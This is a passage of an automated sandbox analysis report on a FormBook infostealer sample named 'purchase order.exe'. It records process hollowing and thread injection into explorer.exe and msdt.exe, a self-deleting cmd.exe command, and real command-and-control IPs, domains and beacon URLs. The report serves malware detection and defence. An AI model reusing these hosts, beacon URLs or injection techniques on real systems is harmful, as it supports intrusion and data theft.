Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04855210 mov eax, dword ptr fs:[00000030h] 5_2_04855210
Enables debug privileges
Source: C:\Users\user\Desktop\purchase order.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\purchase order.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msdt.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 154.3.112.106 80
Source: C:\Windows\explorer.exe Network Connect: 192.252.210.84 80
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\purchase order.exe Memory written: C:\Users\user\Desktop\purchase order.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\purchase order.exe Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\purchase order.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\purchase order.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: F60000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\purchase order.exe Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000003.00000002.600093828.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000005.00000002.601109998.00000000030E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Users\user\Desktop\purchase order.exe VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A2A4C0 GetUserNameA, 0_2_06A2A4C0
Source: C:\Users\user\Desktop\purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323034 Sample: purchase order.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 31 www.keystonefulfillment.com 2->31 33 g.msn.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 8 other signatures 2->47 11 purchase order.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\purchase order.exe.log, ASCII 11->29 dropped 57 Injects a PE file into a foreign processes 11->57 15 purchase order.exe 11->15         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 15->59 61 Maps a DLL or memory area into another process 15->61 63 Sample uses process hollowing technique 15->63 65 Queues an APC in another process (thread injection) 15->65 18 explorer.exe 15->18 injected process9 dnsIp10 35 purehempbotanicalsinfo.com 154.3.112.106, 49759, 80 UNMETEREDCA United States 18->35 37 makgxoimisitzer.info 192.252.210.84, 49754, 80 TOTAL-SERVER-SOLUTIONSUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 msdt.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
154.3.112.106 | unknown | United States | 54133 | UNMETEREDCA | true
192.252.210.84 | unknown | United States | 46562 | TOTAL-SERVER-SOLUTIONSUS | true

Contacted Domains

Name | IP | Active
rettexo.com | 34.102.136.180 | true
makgxoimisitzer.info | 192.252.210.84 | true
www.keystonefulfillment.com | 52.58.78.16 | true
purehempbotanicalsinfo.com | 154.3.112.106 | true
www.makgxoimisitzer.info | unknown | unknown
www.rettexo.com | unknown | unknown
g.msn.com | unknown | unknown
www.purehempbotanicalsinfo.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.purehempbotanicalsinfo.com/sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp | true | Avira URL Cloud: safe | unknown
http://www.rettexo.com/sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp | true | Avira URL Cloud: safe | unknown
http://www.makgxoimisitzer.info/sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp | true | Avira URL Cloud: safe | unknown